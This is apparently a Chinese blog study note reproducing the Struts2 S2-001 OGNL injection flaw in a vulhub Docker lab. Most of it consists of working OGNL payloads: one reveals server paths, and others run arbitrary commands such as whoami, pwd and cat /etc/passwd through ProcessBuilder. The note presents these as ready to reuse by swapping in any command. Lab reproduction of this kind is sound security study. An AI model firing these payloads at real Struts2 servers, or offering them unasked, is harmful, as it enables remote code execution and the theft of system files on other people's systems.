Struts2 漏洞S2-001复现学习笔记

S2-001复现

原理：该漏洞因用户提交表单数据并且验证失败时，后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析，然后重新填充到对应的表单数据中。如注册或登录页面，提交失败后一般会默认返回之前提交的数据，由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析，所以可以直接构造 Payload进行命令执行。

漏洞环境搭建

https://github.com/vulhub/vulhub/tree/master/struts2/s2-001

运行以下命令进行设置

1
2
3
docker-compose build
docker-compose up -d

访问 http://127.0.0.1:8080/

漏洞poc测试

1.输入**%{‘123’}**，sumbit

2.返回123，参数值，证明漏洞存在

构造poc

1. 获取tomcat路径：

   复制代码%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

   1
   2
   %{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}
   

语句执行后，查看返回的语句信息：

2. 获取网站真实路径：

   复制代码%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}

   1
   2
   %{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}
   

3. 构造查看权限的poc：

   复制代码%{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(), #b=#a.getInputStream(), #c=new java.io.InputStreamReader(#b), #d=new java.io.BufferedReader(#c), #e=new char[50000], #d.read(#e), #f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"), #f.getWriter().println(new java.lang.String(#e)), #f.getWriter().flush(),#f.getWriter().close() }

   1
   2
   3
   4
   5
   6
   7
   8
   9
   10
   11
   12
   13
   14
   15
   16
   17
   18
   19
   20
   21
   22
   %{
   
   #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),
   
   #b=#a.getInputStream(),
   
   #c=new java.io.InputStreamReader(#b),
   
   #d=new java.io.BufferedReader(#c),
   
   #e=new char[50000],
   
   #d.read(#e),
   
   #f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
   
   #f.getWriter().println(new java.lang.String(#e)),
   
   #f.getWriter().flush(),#f.getWriter().close()
   
   }
   

4. 执行任意命令只需要将上面的poc中whoami替换：

   复制代码%{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(), #b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b), #d=new java.io.BufferedReader(#c), #e=new char[50000],#d.read(#e), #f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"), #f.getWriter().println(new java.lang.String(#e)), #f.getWriter().flush(), #f.getWriter().close() }

   1
   2
   3
   4
   5
   6
   7
   8
   9
   10
   11
   12
   13
   14
   15
   16
   17
   18
   19
   20
   %{
   
   #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),
   
   #b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),
   
   #d=new java.io.BufferedReader(#c),
   
   #e=new char[50000],#d.read(#e),
   
   #f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
   
   #f.getWriter().println(new java.lang.String(#e)),
   
   #f.getWriter().flush(),
   
   #f.getWriter().close()
   
   }
   

5. 执行命令（带参数的命令：new java.lang.String[]{"cat","/etc/passwd"}）：

   复制代码%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

   1
   2
   %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
   

关闭docker环境

1
2
命令：docker-compose down -v

最后

以上就是潇洒宝马最近收集整理的关于Struts2漏洞S2-001复现Struts2 漏洞S2-001复现学习笔记的全部内容，更多相关Struts2漏洞S2-001复现Struts2内容请搜索靠谱客的其他文章。